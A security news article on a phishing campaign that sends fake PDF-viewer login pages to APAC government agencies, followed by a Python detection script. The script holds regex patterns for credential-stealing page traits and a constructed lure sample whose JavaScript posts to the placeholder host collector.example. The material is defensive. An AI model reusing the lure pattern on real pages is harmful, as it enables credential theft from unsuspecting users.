Government Agencies in APAC Targeted by Fake PDF Login Phishing Emails
Forcepoint X-Labs, a leading cybersecurity research team, has issued an urgent warning regarding a surge in sophisticated phishing emails targeting government departments across the Asia-Pacific (APAC) region. These deceptive emails masquerade as login pages for PDF viewers, luring unsuspecting victims into revealing their sensitive credentials.
The attackers, operating from the email address hachemi52d31[at]live[.]fr, have meticulously crafted HTML pages that mimic legitimate PDF viewer login screens. Once a user enters their email and password, the malicious code hidden within the page validates the information and sends it to the attackers’ server.
Unveiling the Phishing Scheme
Forcepoint’s analysis of the phishing code reveals a multi-layered attack designed to evade detection. The attackers employ obfuscation techniques, making the code difficult to decipher. However, researchers were able to decode the malicious JavaScript, revealing its true intent.
The code performs several actions, including:
- Reading values from hidden input fields within the HTML page.
- Listening for user input and triggering actions upon pressing the Enter key.
- Parsing the URL for specific information.
- Validating the entered email address and password.
- Sending the captured credentials to the attackers’ server via an AJAX POST request.
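A static triage check for HTML attachments that looks for the behaviours listed above, as an added example (not Forcepoint's code and not code from the campaign). It assumes the script has already been decoded, since obfuscated JavaScript will not match these patterns; the trait names, the sample pages and the collector.example host are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Traits matched on decoded script text; obfuscated code must be unpacked first.
SCRIPT_TRAITS = {
    "enter_key_handler": re.compile(r"(?:keyCode|which)\s*={2,3}\s*13|key\s*={2,3}\s*['\"]Enter['\"]"),
    "url_parsing": re.compile(r"location\.(?:hash|search|href)"),
    "ajax_request": re.compile(r"\$\.(?:ajax|post)\s*\(|XMLHttpRequest|fetch\s*\("),
    "remote_endpoint": re.compile(r"['\"]https?://[^'\"\s]+['\"]"),
}

class AttachmentScan(HTMLParser):
    """Collects input-field traits and inline script text from one HTML file."""
    def __init__(self):
        super().__init__()
        self.traits, self.scripts, self._in_script = set(), [], False

    def handle_starttag(self, tag, attrs):
        kind = (dict(attrs).get("type") or "").lower()
        if tag == "script":
            self._in_script = True
        elif tag == "input" and kind in ("hidden", "password"):
            self.traits.add(kind + "_input")
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def scan_html(html):
    """Return the set of trait names found in an HTML attachment."""
    parser = AttachmentScan()
    parser.feed(html)
    parser.close()
    js = "\n".join(parser.scripts)
    return parser.traits | {name for name, rx in SCRIPT_TRAITS.items() if rx.search(js)}

def is_suspicious(html):
    """Flag the combination: a password field on a page that also calls a remote URL."""
    return {"password_input", "ajax_request", "remote_endpoint"} <= scan_html(html)

# Constructed samples, not taken from the campaign; collector.example is a placeholder.
SAMPLE_LURE = """<input type="hidden" id="ref" value="x"><input type="password" id="p">
<script>var who = window.location.hash.substr(1);
document.addEventListener("keydown", function (ev) { if (ev.keyCode == 13) send(); });
function send() { $.ajax({type: "POST", url: "https://collector.example/c", data: {}}); }
</script>"""
SAMPLE_BENIGN = '<form action="/login" method="post"><input type="password" name="p"></form>'
```

A password field alone is not flagged; the verdict depends on the combination, which keeps ordinary login forms out of the alert queue.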
Protecting Against Phishing Attacks
The increasing sophistication of phishing attacks demands heightened vigilance from individuals and organizations alike. Government agencies in the APAC region are urged to take immediate action to protect themselves from this ongoing campaign.